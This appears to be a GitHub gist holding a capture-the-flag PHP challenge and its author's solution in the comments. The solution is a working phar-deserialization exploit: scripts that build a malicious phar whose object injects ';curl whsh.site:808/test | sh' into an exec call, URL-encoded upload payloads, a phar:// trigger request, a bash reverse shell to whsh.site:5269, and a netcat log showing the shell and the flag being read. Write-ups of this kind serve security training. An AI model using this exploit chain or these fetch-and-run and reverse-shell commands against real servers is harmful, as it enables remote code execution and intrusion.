Created
January 12, 2020 14:36
-
-
Save honor2016tw/7197dce1319a3408a8572ef6ca578f0e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php if (isset($_GET['info'])) die(phpinfo()); | |
| $filename = $_GET['f']??"kophp.php"; | |
| if (isset($_GET['c']) && strlen($_GET['c']) < 87) | |
| { | |
| $f = "/tmp/" . uniqid(rand() , true); | |
| if (stripos($_GET['c'], "path")) exit(); | |
| file_put_contents($f, $_GET['c']); | |
| die($f); | |
| } | |
| strtolower($filename[0]) == "p" ? die("Bad 🍊!") : die(htmlspecialchars(file_get_contents($filename))); | |
Author
honor2016tw
commented
Jan 12, 2020
Author
<?php class InitialOperation
{
private $path = "/tmp/*";
function __destruct()
{
exec("rm " . $this->path);
}
}
new InitialOperation();
Author
<?php
class InitialOperation {
private $path = ";curl whsh.site:5269";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new InitialOperation();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo urlencode(file_get_contents("phar.phar"));
?>
Author
use array to bypass file_put_contents()
/?c[]=%3C%3Fphp+__HALT_COMPILER%28%29%3B+%3F%3E%0D%0A%8C%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00V%00%00%00O%3A16%3A%22InitialOperation%22%3A1%3A%7Bs%3A22%3A%22%00InitialOperation%00path%22%3Bs%3A20%3A%22%3Bcurl+whsh.site%3A5269%22%3B%7D%08%00%00%00test.txt%04%00%00%00%E3U%1B%5E%04%00%00%00%0C%7E%7F%D8%A4%01%00%00%00%00%00%00test+%60%FF%94%8Ch%81E7%E0c%07%7ER%F7Z%9871%CA%02%00%00%00GBMB
/tmp/10956229125e1b5601bfe5a5.15651717
Author
curl -k https://eductf.zoolab.org:28443/?f=compress.zlib://phar:///tmp/10956229125e1b5601bfe5a5.15651717
Author
<?php
class InitialOperation {
private $path = ";curl whsh.site:808/test | sh";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new InitialOperation();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo urlencode(file_get_contents("phar.phar"));
?>
Author
test
bash -c 'bash -i >& /dev/tcp/whsh.site/5269 0>&1'
Author
/?c[]=%3C%3Fphp+__HALT_COMPILER%28%29%3B+%3F%3E%0D%0A%93%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%5D%00%00%00O%3A16%3A%22InitialOperation%22%3A1%3A%7Bs%3A22%3A%22%00InitialOperation%00path%22%3Bs%3A27%3A%22%3Bcurl+whsh.site%3A808%2Ftest%7Csh%22%3B%7D%08%00%00%00test.txt%04%00%00%00%B5X%1B%5E%04%00%00%00%0C%7E%7F%D8%A4%01%00%00%00%00%00%00test%C0%10%9B%8E%89h7%F8%A5%CBuN%C6s%5E%F8%B6hW%1F%02%00%00%00GBMB
/tmp/14955586845e1b58ddcfbd91.94985006
Author
root@whcsc-ubuntu-16:~# nc -kvl 5269
Listening on [0.0.0.0] (family 0, port 5269)
Connection from [140.113.203.209] port 5269 [tcp/xmpp-server] accepted (family 2, sport 39480)
bash: cannot set terminal process group (32): Inappropriate ioctl for device
bash: no job control in this shell
www-data@05ed21fb2848:/$ ls
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
readflag
readflag.c
root
run
sbin
srv
sys
tmp
usr
var
why_the_flag_name_is_so_weird
Author
www-data@05ed21fb2848:/$ ./readflag
./readflag
FLAG{oh_php7.4_preload_so__coool!}
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment